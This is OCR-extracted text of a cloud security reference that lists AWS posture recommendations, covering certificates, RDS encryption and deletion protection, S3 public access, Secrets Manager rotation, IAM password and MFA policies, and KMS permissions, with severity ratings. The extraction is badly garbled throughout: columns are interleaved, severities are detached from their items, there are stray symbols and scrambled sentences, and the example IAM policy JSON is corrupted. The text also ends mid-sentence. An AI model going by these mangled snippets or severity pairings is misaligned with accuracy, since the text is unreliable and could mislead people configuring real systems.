
HTTPS connections to your website or application in AWS, you 
need an SSL/TLS server certificate. You can use ACM or IAM to 
store and deploy server certificates. Removing expired SSL/TLS 


High 


certificates eliminates the risk that an invalid certificate will be 
deployed accidentally to a resource such as AWS Elastic Load 
Balancer (ELB), which can damage the credibility of the 
application/website behind the ELB. This check generates alerts if 
there are any expired SSL/TLS certificates stored in AWS IAM. As 
a best practice, it's recommended to delete expired certificates. 


This control checks whether ACM certificates in your account are 
marked for expiration within 30 days. It checks both imported 
certificates and certificates provided by AWS Certificate Manager. 
ACM can automatically renew certificates that use DNS 
validation. For certificates that use email validation, you must 
respond to a domain validation email. 

ACM also doesn't automatically renew certificates that you 
import. You must renew imported certificates manually. 

For more information about managed renewal for ACM 
certificates, see Managed renewal for ACM certificates “ in the 
AWS Certificate Manager User Guide. 


Severity 


Medium 


Recommendation 


Over-provisioned 
identities in 
accounts should 
be investigated to 
reduce the 
Permission Creep 
Index (PCI) 2 


RDS automatic 
minor version 
upgrades should 
be enabled Z 


RDS cluster 
snapshots and 
database 
snapshots should 
be encrypted at 
rest č 


RDS clusters 
should have 
deletion 
protection 
enabled £Z 


RDS DB clusters 
should be 
configured for 
multiple 
Availability 
Zones č 


Description 


Over-provisioned identities in accounts should be investigated to 
reduce the Permission Creep Index (PCI) and to safeguard your 
infrastructure. Reduce the PCI by removing the unused high risk 
permission assignments. High PCI reflects risk associated with the 
identities with permissions that exceed their normal or required 
usage 


This control checks whether automatic minor version upgrades 
are enabled for the RDS database instance. 

Enabling automatic minor version upgrades ensures that the 
latest minor version updates to the relational database 
management system (RDBMS) are installed. These upgrades 
might include security patches and bug fixes. Keeping up to date 
with patch installation is an important step in securing systems. 


This control checks whether RDS DB snapshots are encrypted. 
This control is intended for RDS DB instances. However, it can 
also generate findings for snapshots of Aurora DB instances, 
Neptune DB instances, and Amazon DocumentDB clusters. If 
these findings aren't useful, then you can suppress them. 
Encrypting data at rest reduces the risk that an unauthenticated 
user gets access to data that is stored on disk. Data in RDS 
snapshots should be encrypted at rest for an added layer of 
security. 


This control checks whether RDS clusters have deletion 
protection enabled. 

This control is intended for RDS DB instances. However, it can 
also generate findings for Aurora DB instances, Neptune DB 
instances, and Amazon DocumentDB clusters. If these findings 
aren't useful, then you can suppress them. 

Enabling cluster deletion protection is an more layer of 
protection against accidental database deletion or deletion by an 
unauthorized entity. 

When deletion protection is enabled, an RDS cluster can't be 
deleted. Before a deletion request can succeed, deletion 
protection must be disabled. 


RDS DB clusters should be configured for multiple the data that 
is stored. 

Deployment to multiple Availability Zones allows for automate 
Availability Zones to ensure availability of ed failover in the event 
of an Availability Zone availability issue and during regular RDS 
maintenance events. 


Severity 


Medium 


High 


Medium 


Low 


Medium 


Recommendation 


RDS DB clusters 
should be 
configured to 
copy tags to 
snapshots Z 


RDS DB instances 
should be 
configured to 
copy tags to 
snapshots Si 


RDS DB instances 
should be 
configured with 
multiple 
Availability 
Zones č 


RDS DB instances 
should have 
deletion 
protection 
enabled Z 


Description 


Identification and inventory of your IT assets is a crucial aspect of 
governance and security. 

You need to have visibility of all your RDS DB clusters so that you 
can assess their security posture and act on potential areas of 
weakness. 

Snapshots should be tagged in the same way as their parent RDS 
database clusters. 

Enabling this setting ensures that snapshots inherit the tags of 
their parent database clusters. 


This control checks whether RDS DB instances are configured to 
copy all tags to snapshots when the snapshots are created. 
Identification and inventory of your IT assets is a crucial aspect of 
governance and security. 

You need to have visibility of all your RDS DB instances so that 
you can assess their security posture and take action on potential 
areas of weakness. 

Snapshots should be tagged in the same way as their parent RDS 
database instances. Enabling this setting ensures that snapshots 
inherit the tags of their parent database instances. 


This control checks whether high availability is enabled for your 
RDS DB instances. 

RDS DB instances should be configured for multiple Availability 
Zones (AZs). This ensures the availability of the data stored. 
Multi-AZ deployments allow for automated failover if there's an 
issue with Availability Zone availability and during regular RDS 
maintenance. 


This control checks whether your RDS DB instances that use one 
of the listed database engines have deletion protection enabled. 
Enabling instance deletion protection is an more layer of 
protection against accidental database deletion or deletion by an 
unauthorized entity. 

While deletion protection is enabled, an RDS DB instance can't 
be deleted. Before a deletion request can succeed, deletion 
protection must be disabled. 


Severity 


Low 


Low 


Medium 


Low 


Recommendation 


RDS DB instances 
should have 
encryption at rest 
enabled Z 


RDS DB Instances 
should prohibit 
public access 7 


RDS snapshots 
should prohibit 
public access E 


Description 


This control checks whether storage encryption is enabled for 
your Amazon RDS DB instances. 

This control is intended for RDS DB instances. However, it can 
also generate findings for Aurora DB instances, Neptune DB 
instances, and Amazon DocumentDB clusters. If these findings 
aren't useful, then you can suppress them. 

For an added layer of security for your sensitive data in RDS DB 
instances, you should configure your RDS DB instances to be 
encrypted at rest. To encrypt your RDS DB instances and 
snapshots at rest, enable the encryption option for your RDS DB 
instances. Data that is encrypted at rest includes the underlying 
storage for DB instances, its automated backups, read replicas, 
and snapshots. 

RDS encrypted DB instances use the open standard AES-256 
encryption algorithm to encrypt your data on the server that 
hosts your RDS DB instances. After your data is encrypted, 
Amazon RDS handles authentication of access and decryption of 
your data transparently with a minimal impact on performance. 
You don't need to modify your database client applications to 
use encryption. 

Amazon RDS encryption is currently available for all database 
engines and storage types. Amazon RDS encryption is available 
for most DB instance classes. To learn about DB instance classes 
that don't support Amazon RDS encryption, see Encrypting 
Amazon RDS resources č in the Amazon RDS User Guide. 


We recommend that you also ensure that access to your RDS 
instance's configuration is limited to authorized users only, by 
restricting users' IAM permissions to modify RDS instances’ 
settings and resources. 


We recommend only allowing authorized principals to access the 
snapshot and change Amazon RDS configuration. 


Severity 


Medium 


High 


High 


Recommendation 


Remove unused 
Secrets Manager 
secrets E 


S3 buckets should 
have cross-region 
replication 
enabled Z 


S3 buckets should 
have server-side 
encryption 
enabled Z 


Secrets Manager 
secrets configured 
with automatic 
rotation should 
rotate 
successfully Z 


Description 


This control checks whether your secrets have been accessed 
within a specified number of days. The default value is 90 days. If 
a secret wasn't accessed within the defined number of days, this 
control fails. 

Deleting unused secrets is as important as rotating secrets. 
Unused secrets can be abused by their former users, who no 
longer need access to these secrets. Also, as more users get 
access to a secret, someone might have mishandled and leaked it 
to an unauthorized entity, which increases the risk of abuse. 
Deleting unused secrets helps revoke secret access from users 
who no longer need it. It also helps to reduce the cost of using 
Secrets Manager. Therefore, it's essential to routinely delete 
unused secrets. 


Enabling S3 cross-region replication ensures that multiple 
versions of the data are available in different distinct Regions. 
This allows you to protect your S3 bucket against DDoS attacks 
and data corruption events. 


Enable server-side encryption to protect data in your S3 buckets. 
Encrypting the data can prevent access to sensitive data in the 
event of a data breach. 


This control checks whether an AWS Secrets Manager secret 
rotated successfully based on the rotation schedule. The control 
fails if RotationOccurringAsScheduled is false. The control 
doesn't evaluate secrets that don't have rotation configured. 
Secrets Manager helps you improve the security posture of your 
organization. Secrets include database credentials, passwords, 
and third-party API keys. You can use Secrets Manager to store 
secrets centrally, encrypt secrets automatically, control access to 
secrets, and rotate secrets safely and automatically. 

Secrets Manager can rotate secrets. You can use rotation to 
replace long-term secrets with short-term ones. Rotating your 
secrets limits how long an unauthorized user can use a 
compromised secret. For this reason, you should rotate your 
secrets frequently. 

In addition to configuring secrets to rotate automatically, you 
should ensure that those secrets rotate successfully based on the 
rotation schedule. 

To learn more about rotation, see Rotating your AWS Secrets 
Manager secrets rz in the AWS Secrets Manager User Guide. 


Severity 


Medium 


Low 


Medium 


Medium 


Recommendation 


Secrets Manager 
secrets should be 
rotated within a 
specified number 
of days Z 


SNS topics should 
be encrypted at 
rest using AWS 
KMS Z 


VPC flow logging 
should be enabled 
in all VPCs Z 


AWS IdentityAndAccess recommendations 


Description 


This control checks whether your secrets have been rotated at 
least once within 90 days. 

Rotating secrets can help you to reduce the risk of an 
unauthorized use of your secrets in your AWS account. Examples 
include database credentials, passwords, third-party API keys, 
and even arbitrary text. If you don't change your secrets for a 
long period of time, the secrets are more likely to be 
compromised. 

As more users get access to a secret, it can become more likely 
that someone mishandled and leaked it to an unauthorized 
entity. Secrets can be leaked through logs and cache data. They 
can be shared for debugging purposes and not changed or 
revoked once the debugging completes. For all these reasons, 
secrets should be rotated frequently. 

You can configure your secrets for automatic rotation in AWS 
Secrets Manager. With automatic rotation, you can replace long- 
term secrets with short-term ones, significantly reducing the risk 
of compromise. 

Security Hub recommends that you enable rotation for your 
Secrets Manager secrets. To learn more about rotation, see 
Rotating your AWS Secrets Manager secrets “ in the AWS Secrets 
Manager User Guide. 


This control checks whether an SNS topic is encrypted at rest 
using AWS KMS. 

Encrypting data at rest reduces the risk of data stored on disk 
being accessed by a user not authenticated to AWS. It also adds 
another set of access controls to limit the ability of unauthorized 
users to access the data. 

For example, API permissions are required to decrypt the data 
before it can be read. SNS topics should be encrypted at-rest for 
an added layer of security. For more information, see Encryption 
at rest Dn the Amazon Simple Notification Service Developer 
Guide. 


VPC Flow Logs provide visibility into network traffic that passes 
through the VPC and can be used to detect anomalous traffic or 
insight during security events. 


There are 46 AWS recommendations in this category. 


Recommendation 


Description 


Severity 


Medium 


Medium 


Medium 


Severity 


Recommendation 


Amazon 
Elasticsearch 
Service domains 
should be ina 
VPC £ 


Amazon S3 
permissions 
granted to other 
AWS accounts in 
bucket policies 
should be 
restricted 7 


Avoid the use of 
the "root" 
account E 


AWS KMS keys 
should not be 
unintentionally 
deleted Z 


Description 


VPC cannot contain domains with a public endpoint. 
Note: this does not evaluate the VPC subnet routing 
configuration to determine public reachability. 


Implementing least privilege access is fundamental to reducing 
security risk and the impact of errors or malicious intent. If an S3 
bucket policy allows access from external accounts, it could result 
in data exfiltration by an insider threat or an attacker. The 
‘blacklistedactionpatterns' parameter allows for successful 
evaluation of the rule for S3 buckets. The parameter grants 
access to external accounts for action patterns that are not 
included in the 'blacklistedactionpatterns' list. 


The "root" account has unrestricted access to all resources in the 
AWS account. It is highly recommend that the use of this account 
be avoided. 

The "root" account is the most privileged AWS account. 
Minimizing the use of this account and adopting the principle of 
least privilege for access management will reduce the risk of 
accidental changes and unintended disclosure of highly 
privileged credentials. 


This control checks whether KMS keys are scheduled for deletion. 
The control fails if a KMS key is scheduled for deletion. 

KMS keys cannot be recovered once deleted. Data encrypted 
under a KMS key is also permanently unrecoverable if the KMS 
key is deleted. If meaningful data has been encrypted under a 
KMS key scheduled for deletion, consider decrypting the data or 
re-encrypting the data under a new KMS key unless you are 
intentionally performing a cryptographic erasure. 

When a KMS key is scheduled for deletion, a mandatory waiting 
period is enforced to allow time to reverse the deletion, if it was 
scheduled in error. The default waiting period is 30 days, but it 
can be reduced to as short as 7 days when the KMS key is 
scheduled for deletion. During the waiting period, the scheduled 
deletion can be canceled and the KMS key will not be deleted. 
For additional information regarding deleting KMS keys, see 
Deleting KMS keys # in the AWS Key Management Service 
Developer Guide. 


Severity 


High 


High 


High 


High 


Recommendation 


AWS WAF Classic 
global web ACL 
logging should be 
enabled Z 


CloudFront 
distributions 
should have a 
default root object 
configured č 


CloudFront 
distributions 
should have origin 
access identity 
enabled Z 


CloudTrail log file 
validation should 
be enabled Z 


CloudTrail should 
be enabled Z 


Description 


This control checks whether logging is enabled for an AWS WAF 
global Web ACL. This control fails if logging is not enabled for 
the web ACL. 

Logging is an important part of maintaining the reliability, 
availability, and performance of AWS WAF globally. It is a 
business and compliance requirement in many organizations, 
and allows you to troubleshoot application behavior. It also 
provides detailed information about the traffic that is analyzed 
by the web ACL that is attached to AWS WAF. 

This control checks whether an Amazon CloudFront distribution High 
is configured to return a specific object that is the default root 

object. The control fails if the CloudFront distribution does not 

have a default root object configured. 

A user might sometimes request the distributions root URL 

instead of an object in the distribution. When this happens, 

specifying a default root object can help you to avoid exposing 

the contents of your web distribution. 


This control checks whether an Amazon CloudFront distribution 
with Amazon S3 Origin type has Origin Access Identity (OAI) 
configured. The control fails if OAI is not configured. 

CloudFront OAI prevents users from accessing S3 bucket content 
directly. When users access an S3 bucket directly, they effectively 
bypass the CloudFront distribution and any permissions that are 
applied to the underlying S3 bucket content. 


To ensure additional integrity checking of CloudTrail logs, we Low 


recommend enabling file validation on all CloudTrails. 


AWS CloudTrail is a web service that records AWS API calls for 
your account and delivers log files to you. Not all services enable 


High 


logging by default for all APIs and events. 

You should implement any additional audit trails other than 
CloudTrail and review the documentation for each service in 
CloudTrail Supported Services and Integrations. 


Severity 


Medium 


Medium 


Recommendation 


CloudtTrail trails 
should be 
integrated with 
CloudWatch 
Logs £ 


Database logging 
should be 
enabled @ 


Disable direct 
internet access for 
Amazon 
SageMaker 
notebook 
instances E 


Description Severity 


In addition to capturing CloudTrail logs within a specified S3 Low 
bucket for long term analysis, real-time analysis can be 
performed by configuring CloudTrail to send logs to CloudWatch 
Logs. 

For a trail that is enabled in all regions in an account, CloudTrail 
sends log files from all those regions to a CloudWatch Logs log 
group. We recommended that CloudTrail logs will be sent to 
CloudWatch Logs to ensure AWS account activity is being 
captured, monitored, and appropriately alarmed on. 

Sending CloudTrail logs to CloudWatch Logs facilitates real-time 
and historic activity logging based on user, API, resource, and IP 
address, and provides opportunity to establish alarms and 
notifications for anomalous or sensitivity account activity. 


This control checks whether the following logs of Amazon RDS Medium 
are enabled and sent to CloudWatch Logs: 

- Oracle: (Alert, Audit, Trace, Listener) 

- PostgreSQL: (Postgresql, Upgrade) 

- MySQL: (Audit, Error, General, SlowQuery) 

- MariaDB: (Audit, Error, General, SlowQuery) 

- SQL Server: (Error, Agent) 

- Aurora: (Audit, Error, General, SlowQuery) 

- Aurora-MySQL: (Audit, Error, General, SlowQuery) 

- Aurora-PostgreSQL: (Postgresql, Upgrade). 

RDS databases should have relevant logs enabled. Database 
logging provides detailed records of requests made to RDS. 
Database logs can assist with security and access audits and can 
help to diagnose availability issues. 


Direct internet access should be disabled for an SageMaker High 
notebook instance. 

This checks whether the 'DirectInternetAccess' field is disabled 
for the notebook instance. 

Your instance should be configured with a VPC and the default 
setting should be Disable - Access the internet through a VPC. 

In order to enable internet access to train or host models from a 
notebook, make sure that your VPC has a NAT gateway and your 
security group allows outbound connections. Ensure access to 
your SageMaker configuration is limited to only authorized users, 
and restrict users' IAM permissions to modify SageMaker settings 
and resources. 


Recommendation 


Do not setup 
access keys during 
initial user setup 
for all IAM users 
that have a 
console 

password ¢ 


Ensure a support 
role has been 
created to 
manage incidents 
with AWS 
Support £ 


Ensure access keys 
are rotated every 
90 days or less 7 


Description Severity 


AWS console defaults the checkbox for creating access keys to Medium 
enabled. This results in many access keys being generated 
unnecessarily. 

In addition to unnecessary credentials, it also generates 
unnecessary management work in auditing and rotating these 
keys. 

Requiring that additional steps be taken by the user after their 
profile has been created will give a stronger indication of intent 
that access keys are [a] necessary for their work and [b] once the 
access key is established on an account that the keys may be in 
use somewhere in the organization 


AWS provides a support center that can be used for incident Low 
notification and response, as well as technical support and 

customer services. 

Create an IAM Role to allow authorized users to manage 

incidents with AWS Support. 

By implementing least privilege for access control, an IAM Role 

will require an appropriate IAM Policy to allow Support Center 


Access in order to manage Incidents with AWS Support. 


Access keys consist of an access key ID and secret access key, Medium 
which are used to sign programmatic requests that you make to 
AWS. 

AWS users need their own access keys to make programmatic 
calls to AWS from the AWS Command Line Interface (AWS CLI), 
Tools for Windows PowerShell, the AWS SDKs, or direct HTTP 
calls using the APIs for individual AWS services. 

It is recommended that all access keys be regularly rotated. 
Rotating access keys will reduce the window of opportunity for 
an access key that is associated with a compromised or 
terminated account to be used. 

Access keys should be rotated to ensure that data cannot be 
accessed with an old key which might have been lost, cracked, or 
stolen. 


Recommendation 


Ensure AWS 
Config is enabled 
in all regions Z 


Ensure Cloudtrail 
is enabled in all 
regions E 


Ensure credentials 
unused for 90 
days or greater 
are disabled 7 


Description 


AWS Config is a web service that performs configuration 
management of supported AWS resources within your account 
and delivers log files to you. 

The recorded information includes the configuration item (AWS 
resource), relationships between configuration items (AWS 
resources), any configuration changes between resources. 

It is recommended to enable AWS Config be enabled in all 
regions. 


The AWS configuration item history captured by AWS Config 
enables security analysis, resource change tracking, and 
compliance auditing. 


AWS CloudTrail is a web service that records AWS API calls for 
your account and delivers log files to you. 

The recorded information includes the identity of the API caller, 
the time of the API call, the source IP address of the API caller, 
the request parameters, and the response elements returned by 
the AWS service. CloudTrail provides a history of AWS API calls 
for an account, including API calls made via the Management 
Console, SDKs, command line tools, and higher-level AWS 
services (such as CloudFormation). 

The AWS API call history produced by CloudtTrail enables security 
analysis, resource change tracking, and compliance auditing. 
Additionally, 

* ensuring that a multi-regions trail exists will ensure that 
unexpected activity occurring in otherwise unused regions is 
detected 

* ensuring that a multi-regions trail exists will ensure that "Global 
Service Logging" is enabled for a trail by default to capture 
recording of events generated on AWS global services 

* for a multi-regions trail, ensuring that management events 
configured for all type of Read/Writes ensures recording of 
management operations that are performed on all resources in 
an AWS account. 


AWS IAM users can access AWS resources using different types 
of credentials, such as passwords or access keys. 

It is recommended that all credentials that have been unused in 
90 or greater days be removed or deactivated. 

Disabling or removing unnecessary credentials will reduce the 
window of opportunity for credentials associated with a 
compromised or abandoned account to be used. 


Severity 


Medium 


High 


Medium 


Recommendation 


Ensure IAM 
password policy 
expires passwords 
within 90 days or 
less E 


Ensure IAM 
password policy 
prevents password 
reuse E 


Ensure IAM 
password policy 
requires at least 
one lowercase 
letter 2 


Ensure IAM 
password policy 
requires at least 
one number % 


Description 


IAM password policies can require passwords to be rotated or 
expired after a given number of days. 

It is recommended that the password policy expire passwords 
after 90 days or less. 

Reducing the password lifetime increases account resiliency 
against brute force login attempts. Additionally, requiring regular 
password changes help in the following scenarios: 

* Passwords can be stolen or compromised sometimes without 
your knowledge. This can happen via a system compromise, 
software vulnerability, or internal threat. 

* Certain corporate and government web filters or proxy servers 
have the ability to intercept and record traffic even if it's 
encrypted. 

* Many people use the same password for many systems such as 
work, email, and personal. 

* Compromised end user workstations might have a keystroke 
logger. 


IAM password policies can prevent the reuse of a given password 
by the same user. 

It is recommended that the password policy prevent the reuse of 
passwords. 

Preventing password reuse increases account resiliency against 
brute force login attempts. 


Password policies are, in part, used to enforce password 
complexity requirements. IAM password policies can be used to 
ensure password are comprised of different character sets. 

It is recommended that the password policy require at least one 
lowercase letter. 

Setting a password complexity policy increases account resiliency 
against brute force login attempts 


Password policies are, in part, used to enforce password 
complexity requirements. IAM password policies can be used to 
ensure password are comprised of different character sets. 

It is recommended that the password policy require at least one 
number. 

Setting a password complexity policy increases account resiliency 
against brute force login attempts. 


Severity 


Low 


Low 


Medium 


Medium 


Recommendation 


Ensure IAM 
password policy 
requires at least 
one symbol £ 


Ensure IAM 
password policy 
requires at least 
one uppercase 
letter Z 


Ensure IAM 
password policy 
requires minimum 
length of 14 or 
greater? 


Ensure multi- 
factor 
authentication 
(MFA) is enabled 
for all IAM users 
that have a 
console 
password % 


GuardDuty should 
be enabled Z 


Description 


Password policies are, in part, used to enforce password 
complexity requirements. 

IAM password policies can be used to ensure password are 
comprised of different character sets. 

It is recommended that the password policy require at least one 
symbol. 

Setting a password complexity policy increases account resiliency 
against brute force login attempts. 


Password policies are, in part, used to enforce password 
complexity requirements. IAM password policies can be used to 
ensure password are comprised of different character sets. 

It is recommended that the password policy require at least one 
uppercase letter. 

Setting a password complexity policy increases account resiliency 
against brute force login attempts. 


Password policies are, in part, used to enforce password 
complexity requirements. IAM password policies can be used to 
ensure password are at least a given length. 

It is recommended that the password policy require a minimum 
password length IA, 

Setting a password complexity policy increases account resiliency 
against brute force login attempts. 


Multi-Factor Authentication (MFA) adds an extra layer of 
protection on top of a user name and password. 

With MFA enabled, when a user signs in to an AWS website, they 
will be prompted for their user name and password as well as for 
an authentication code from their AWS MFA device. 

It is recommended that MFA be enabled for all accounts that 
have a console password. 

Enabling MFA provides increased security for console access as it 
requires the authenticating principal to possess a device that 
emits a time-sensitive key and have knowledge of a credential. 


To provide additional protection against intrusions, GuardDuty 
should be enabled on your AWS account and region. 

Note: GuardDuty might not be a complete solution for every 
environment 


Severity 


Medium 


Medium 


Medium 


Medium 


Medium 


Recommendation 


Hardware MFA 
should be enabled 
for the "root" 
account E 


IAM 
authentication 
should be 
configured for 
RDS clusters 7 


IAM 
authentication 
should be 
configured for 
RDS instances E 


Description 


The root account is the most privileged user in an account. MFA 
adds an extra layer of protection on top of a user name and 
password. With MFA enabled, when a user signs in to an AWS 
website, they're prompted for their user name and password and 
for an authentication code from their AWS MFA device. 

For Level 2, it is recommended that you protect the root account 
with a hardware MFA. A hardware MFA has a smaller attack 
surface than a virtual MFA. For example, a hardware MFA doesn't 
suffer the attack surface introduced by the mobile smartphone 
that a virtual MFA resides on. 

Using hardware MFA for many, many accounts might create a 
logistical device management issue. If this occurs, consider 
implementing this Level 2 recommendation selectively to the 
highest security accounts. You can then apply the Level 1 
recommendation to the remaining accounts. 


This control checks whether an RDS DB cluster has IAM database 
authentication enabled. 

IAM database authentication allows for password-free 
authentication to database instances. The authentication uses an 
authentication token. Network traffic to and from the database is 
encrypted using SSL. For more information, see [AM database 
authentication in the Amazon Aurora User Guide. 


This control checks whether an RDS DB instance has IAM 
database authentication enabled. 

IAM database authentication allows authentication to database 
instances with an authentication token instead of a password. 
Network traffic to and from the database is encrypted using SSL. 
For more information, see IAM database authentication in the 
Amazon Aurora User Guide. 


Severity 


Low 


Medium 


Medium 


Recommendation Description Severity 


IAM customer Checks whether the default version of IAM customer managed Medium 
managed policies policies allow principals to use the AWS KMS decryption actions 
should not allow on all resources. This control uses Zelkova č, an automated 
decryption actions reasoning engine, to validate and warn you about policies that 
on all KMS keys’ may grant broad access to your secrets across AWS accounts. This 
control fails if the "kms:Decrypt" or "kms:ReEncryptFrom” actions 
are allowed on all KMS keys. The control evaluates both attached 
and unattached customer managed policies. It does not check 
inline policies or AWS managed policies. 
With AWS KMS, you control who can use your KMS keys and gain 
access to your encrypted data. IAM policies define which actions 
an identity (user, group, or role) can perform on which resources. 
Following security best practices, AWS recommends that you 
allow least privilege. In other words, you should grant to 
identities only the "kms:Decrypt" or "kms:ReEncryptFrom" 
permissions and only for the keys that are required to perform a 
task. Otherwise, the user might use keys that are not appropriate 
for your data. 
Instead of granting permissions for all keys, determine the 
minimum set of keys that users need to access encrypted data. 
Then design policies that allow users to use only those keys. For 
example, do not allow "kms:Decrypt" permission on all KMS keys. 
Instead, allow "kms:Decrypt" only on keys in a particular Region 
for your account. By adopting the principle of least privilege, you 
can reduce the risk of unintended disclosure of your data. 


Recommendation Description Severity 


IAM customer This control checks whether the IAM identity-based policies that Low 
managed policies you create have Allow statements that use the * wildcard to grant 
that you create permissions for all actions on any service. The control fails if any 
should not allow policy statement includes ‘Effect’: ‘Allow’ with ‘Action’: 'Service:’. 
wildcard actions For example, the following statement in a policy results in a failed 
for services E finding. 

"Statement': [ 


"Sid': 'EC2-Wildcard', 
‘Effect’: ‘Allow’, 


“Aveo TSEZ Ea 


"Resource': 


E 

The control also fails if you use ‘Effect’: 'Allow' with 'NotAction': 
‘service:’. In that case, the NotAction element provides access to 
all of the actions in an AWS service, except for the actions 
specified in NotAction. 

This control only applies to customer managed IAM policies. It 
does not apply to IAM policies that are managed by AWS. 
When you assign permissions to AWS services, it is important to 
scope the allowed IAM actions in your IAM policies. You should 
restrict IAM actions to only those actions that are needed. This 
helps you to provision least privilege permissions. Overly 
permissive policies might lead to privilege escalation if the 
policies are attached to an IAM principal that might not require 
the permission. 

In some cases, you might want to allow IAM actions that have a 
similar prefix, such as DescribeFlowLogs and 
DescribeAvailabilityZones. In these authorized cases, you can add 
a suffixed wildcard to the common prefix. For example, 
ec2:Describe*. 


This control passes if you use a prefixed IAM action with a 
suffixed wildcard. For example, the following statement in a 
policy results in a passed finding. 

"Statement': [ 

{ 

"Sid': 'EC2-Wildcard’, 

"Effect': ALLO 

"Action': '‘ec2:Describe*', 

"Resource': '*' 

} 

When you group related IAM actions in this way, you can also 
avoid exceeding the IAM policy size limits. 


Recommendation 


IAM policies 
should be 
attached only to 
groups or roles Z 


IAM policies that 
allow full "2" 
administrative 
privileges should 


not be created Z 


Description 


By default, IAM users, groups, and roles have no access to AWS 
resources. IAM policies are the means by which privileges are 
granted to users, groups, or roles. 

It is recommended that IAM policies be applied directly to 
groups and roles but not users. 

Assigning privileges at the group or role level reduces the 
complexity of access management as the number of users grow. 
Reducing access management complexity may in-turn reduce 
opportunity for a principal to inadvertently receive or retain 
excessive privileges. 


IAM policies are the means by which privileges are granted to 
users, groups, or roles. 

It is recommended and considered a standard security advice to 
grant least privilege-that is, granting only the permissions 
required to perform a task. 

Determine what users need to do and then craft policies for them 
that let the users perform only those tasks, instead of allowing 
full administrative privileges. 

It's more secure to start with a minimum set of permissions and 
grant additional permissions as necessary, rather than starting 
with permissions that are too lenient and then trying to tighten 
them later. 

Providing full administrative privileges instead of restricting to 
the minimum set of permissions that the user is required to do 
exposes the resources to potentially unwanted actions. 

IAM policies that have a statement with "Effect": "Allow" with 


"Action": "" over "Resource": "" should be removed. 


Severity 


Low 


High 


Recommendation 


IAM principals 
should not have 
IAM inline policies 
that allow 
decryption actions 
on all KMS keys E 


Lambda functions 
should restrict 
public access E 


MFA should be 
enabled for all 
IAM users E 


MFA should be 
enabled for the 
"root" account Z 


Description Severity 


Checks whether the inline policies that are embedded in your Medium 
IAM identities (role, user, or group) allow the AWS KMS 
decryption actions on all KMS keys. This control uses Zelkova E, 
an automated reasoning engine, to validate and warn you about 
policies that may grant broad access to your secrets across AWS 
accounts. 

This control fails if "kms:Decrypt" or "kms:ReEncryptFrom" actions 
are allowed on all KMS keys in an inline policy. 

With AWS KMS, you control who can use your KMS keys and gain 
access to your encrypted data. IAM policies define which actions 
an identity (user, group, or role) can perform on which resources. 
Following security best practices, AWS recommends that you 
allow least privilege. In other words, you should grant to 
identities only the permissions they need and only for keys that 
are required to perform a task. Otherwise, the user might use 
keys that are not appropriate for your data. 

Instead of granting permission for all keys, determine the 
minimum set of keys that users need to access encrypted data. 
Then design policies that allow the users to use only those keys. 
For example, do not allow "kms:Decrypt" permission on all KMS 
keys. Instead, allow them only on keys in a particular Region for 
your account. By adopting the principle of least privilege, you can 
reduce the risk of unintended disclosure of your data. 


Lambda function resource-based policy should restrict public High 
access. This recommendation does not check access by internal 
principals. 

Ensure access to the function is restricted to authorized principals 

only by using least privilege resource-based policies. 


All IAM users should have multi-factor authentication (MFA) Medium 
enabled. 


The root account is the most privileged user in an account. MFA Low 
adds an extra layer of protection on top of a user name and 
password. With MFA enabled, when a user signs in to an AWS 
website, they're prompted for their user name and password and 
for an authentication code from their AWS MFA device. 

When you use virtual MFA for root accounts, it is recommended 
that the device used is not a personal device. Instead, use a 
dedicated mobile device (tablet or phone) that you manage to 
keep charged and secured independent of any individual 
personal devices. 

This lessens the risks of losing access to the MFA due to device 
loss, device trade-in, or if the individual owning the device is no 
longer employed at the company. 


Recommendation 


Password policies 
for IAM users 
should have 
strong 
configurations 7 


Root account 
access key 
shouldn't exist Z 


S3 Block Public 
Access setting 
should be 
enabled Z 


S3 Block Public 
Access setting 
should be enabled 
at the bucket 

level 7 


Description 


Checks whether the account password policy for IAM users uses 
the following minimum configurations. 

* RequireUppercaseCharacters- Require at least one uppercase 
character in password. (Default = true) 

* RequireLowercaseCharacters- Require at least one lowercase 
character in password. (Default = true) 

* RequireNumbers- Require at least one number in password. 
(Default = true) 

* MinimumPasswordLength- Password minimum length. (Default 
= 7 or longer) 

* PasswordReusePrevention- Number of passwords before 
allowing reuse. (Default = 4) 


* MaxPasswordAge- Number of days before password expiration. 


(Default = 90) 


The root account is the most privileged user in an AWS account. 
AWS Access Keys provide programmatic access to a given AWS 
account. 

It is recommended that all access keys associated with the root 
account be removed. 

Removing access keys associated with the root account limits 
vectors by which the account can be compromised. 

Additionally, removing the root access keys encourages the 
creation and use of role based accounts that are least privileged. 


Enabling Block Public Access setting for your S3 bucket can help 
prevent sensitive data leaks and protect your bucket from 
malicious actions. 


This control checks whether S3 buckets have bucket-level public 
access blocks applied. This control fails is if any of the following 
settings are set to false: 

* ignorePublicAcls 

* blockPublicPolicy 

* blockPublicAcls 

* restrictPublicBuckets 

Block Public Access at the S3 bucket level provides controls to 
ensure that objects never have public access. Public access is 
granted to buckets and objects through access control lists 
(ACLs), bucket policies, or both. 

Unless you intend to have your S3 buckets publicly accessible, 
you should configure the bucket level Amazon S3 Block Public 
Access feature. 


Severity 


Medium 


High 


Medium 


High 


Recommendation 


S3 buckets public 
read access 
should be 
removed č 


S3 buckets public 
write access 
should be 
removed Z 


Secrets Manager 
secrets should 
have automatic 
rotation 

enabled Z 


Stopped EC2 
instances should 
be removed after 
a specified time 
period Z 


Description 


Removing public read access to your S3 bucket can help protect 
your data and prevent a data breach. 


Allowing public write access to your S3 bucket can leave you 
vulnerable to malicious actions such as storing data at your 
expense, encrypting your files for ransom, or using your bucket 
to operate malware. 


This control checks whether a secret stored in AWS Secrets 
Manager is configured with automatic rotation. 

Secrets Manager helps you improve the security posture of your 
organization. Secrets include database credentials, passwords, 
and third-party API keys. You can use Secrets Manager to store 
secrets centrally, encrypt secrets automatically, control access to 
secrets, and rotate secrets safely and automatically. 

Secrets Manager can rotate secrets. You can use rotation to 
replace long-term secrets with short-term ones. Rotating your 
secrets limits how long an unauthorized user can use a 
compromised secret. For this reason, you should rotate your 
secrets frequently. To learn more about rotation, see Rotating 
your AWS Secrets Manager secrets Dn the AWS Secrets 
Manager User Guide. 


This control checks whether any EC2 instances have been 
stopped for more than the allowed number of days. An EC2 
instance fails this check if it is stopped for longer than the 
maximum allowed time period, which by default is 30 days. 

A failed finding indicates that an EC2 instance has not run for a 
significant period of time. This creates a security risk because the 
EC2 instance is not being actively maintained (analyzed, patched, 
updated). If it is later launched, the lack of proper maintenance 
could result in unexpected issues in your AWS environment. To 
safely maintain an EC2 instance over time in a nonrunning state, 
start it periodically for maintenance and then stop it after 
